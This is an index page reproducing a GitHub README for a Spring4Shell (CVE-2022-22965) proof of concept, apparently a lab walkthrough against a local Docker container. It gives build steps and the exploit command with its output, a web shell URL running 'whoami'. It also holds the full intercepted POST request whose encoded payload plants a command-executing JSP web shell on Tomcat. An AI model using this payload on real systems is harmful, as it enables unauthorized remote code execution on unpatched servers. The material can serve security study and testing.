Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/twseptian/cve-2022-22965

Spring4Shell - CVE-2022-22965
https://github.com/twseptian/cve-2022-22965

cve-2022-22965 spring-framework-vulnerability spring4shell spring4shell-poc

Last synced: 8 days ago
JSON representation

Spring4Shell - CVE-2022-22965

Host: GitHub
URL: https://github.com/twseptian/cve-2022-22965
Owner: twseptian
Created: 2022-04-04T16:43:03.000Z (almost 3 years ago)
Default Branch: main
Last Pushed: 2022-04-04T16:54:37.000Z (almost 3 years ago)
Last Synced: 2024-11-06T19:51:16.101Z (about 2 months ago)
Topics: cve-2022-22965, spring-framework-vulnerability, spring4shell, spring4shell-poc
Language: Python
Homepage:
Size: 16.4 MB
Stars: 2
Watchers: 2
Forks: 0
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

        # Spring4Shell - CVE-2022-22965

## Build

- let's clone the repository, build and run the container

```bash

$ git clone https://github.com/twseptian/cve-2022-22965.git

$ cd cve-2022-22965

$ docker build . -t spring4shell-poc

$ docker run -p 8080:8080 --name spring4shell-poc spring4shell-poc

```

- check the access using browser `http://172.17.0.2:8080/spring-form/greeting`

![docker run](screenshots/docker_run.png)

## PoC

- we add proxy on the `poc.py`.

```bash

[SNIP]

proxies = {'http':'http://127.0.0.1:8081','https':'https://127.0.0.1:8081'} #proxy configuration

[SNIP]

...

[SNIP]

        try:

            requests.post(self.url,

                          headers=headers,

                          data=data,

                          timeout=15,

                          allow_redirects=False,

                          verify=False, proxies=proxies)

[SNIP]                          

```

- run the `poc.py` with following command. 

```bash

$ python3 poc.py --url http://172.17.0.2:8080/spring-form/greeting

Vulnerable，shell url: http://172.17.0.2:8080/tomcatwar.jsp?pwd=j&cmd=whoami

```

![python poc](screenshots/poc.png)

**NOTE**: Thanks to [Spring4Shell PoC Application](https://github.com/reznok/Spring4Shell-POC) for the python's exploit

- while the exploit generates a shell url, we can intercept the post request using burpsuite

```bash

POST /spring-form/greeting HTTP/1.1

Host: 172.17.0.2:8080

User-Agent: python-requests/2.23.0

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

suffix: %>//

c1: Runtime

c2: <%

DNT: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 762

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

```

**NOTE**: you can analyze the request by yourself #lul

- the exploit will generate the shell url. we can access the url on the browser to take a remote code execution from target.

![shell url](screenshots/shell_url.png)

![shell url](screenshots/shell_url2.png)

## References

- [Spring4Shell PoC Application](https://github.com/reznok/Spring4Shell-POC)

- [Spring4Shell-POC (CVE-2022-22965)](https://github.com/BobTheShoplifter/Spring4Shell-POC)